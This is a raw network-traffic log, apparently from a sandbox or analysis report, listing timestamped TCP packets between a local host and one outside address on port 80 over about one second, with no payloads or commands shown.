Oct 2, 2024 09:41:21.698940039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698995113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699028969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699081898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699114084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699167013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699201107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699254036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699285984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699320078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699352980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699398041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699409962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699446917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699481964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699517965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699763060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699763060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.699922085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.699978113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700012922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700064898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700098038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700103998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700103998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700103998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700155973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700162888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700191975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700226068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700278044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700282097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700288057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700288057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700311899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700346947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700359106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700359106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700381994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700414896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700416088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700427055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700453043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700488091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.700686932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700686932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.700686932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.701725960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.701829910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.701885939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.701983929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771085978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771136045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771172047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771205902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771241903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771276951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771311998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771333933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771333933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771333933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771333933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771333933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.771348953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.771416903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.777966022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778037071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778074026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778127909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778168917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778168917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778182030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778183937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778218031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778251886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778285027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778292894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778340101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778372049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778422117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778458118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778491020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778522968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778556108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778608084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778662920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778713942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778747082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778758049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.778781891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778815985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778850079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778882027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778917074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778949022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.778981924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779015064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779052019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779097080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779313087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779381037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779414892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779465914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779500008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779532909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779567003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779603004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.779766083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779766083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779766083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.779980898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785274982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785329103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785362959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785403967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785458088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785507917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785507917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785509109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785507917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785507917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785527945 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785545111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785578012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785612106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785645962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785677910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785711050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785720110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.785749912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785804987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785840034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785872936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785928011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.785984039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786017895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786050081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786068916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786068916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786068916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786068916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786068916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786083937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786134958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786168098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786218882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786252975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786284924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786336899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786358118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786358118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786358118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786365986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786370039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786405087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786437988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786470890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786504030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786535978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786545992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786545992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786545992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786545992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786545992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786634922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786669970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786704063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786758900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786792994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786802053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786803007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786803007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786803007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786803007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.786845922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786879063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786911964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.786945105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787050009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787081957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787096977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787096977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787096977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787096977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787111998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787134886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787168980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787203074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787236929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787240982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787240982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787240982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787240982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787271023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787307978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787317038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787317038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787343025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787375927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787385941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787385941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787435055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787450075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787612915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787666082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787719965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787755013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787765980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787765980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787765980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787765980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787791967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787826061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787893057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787894011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787898064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.787928104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.787961960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788013935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788048029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788079977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788114071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788146019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788180113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788204908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788204908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788204908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788204908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788204908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788213968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788249016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.788727045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788727045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.788727045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.859839916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859854937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859859943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859864950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859870911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859874964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859880924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.859885931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.860030890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866571903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866641045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866647005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866684914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866740942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866780043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866815090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866859913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866859913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866859913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866859913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866859913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.866868973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.866976976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867014885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867049932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867110968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867127895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867127895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867127895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867127895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867163897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867197990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867230892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867265940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867310047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867310047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867310047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867310047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867310047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867320061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867361069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867405891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867405891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867429972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867465973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867476940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867522001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867526054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867558002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867572069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867594957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867629051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867661953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867693901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867727041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867760897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867769003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867795944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867830992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867863894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867897034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867901087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867901087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867930889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.867933989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.867966890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.868000031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.868036985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.868232012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.868232012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.868232012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.868232012 CEST	49749	80	192.168.2.4	46.8.231.109
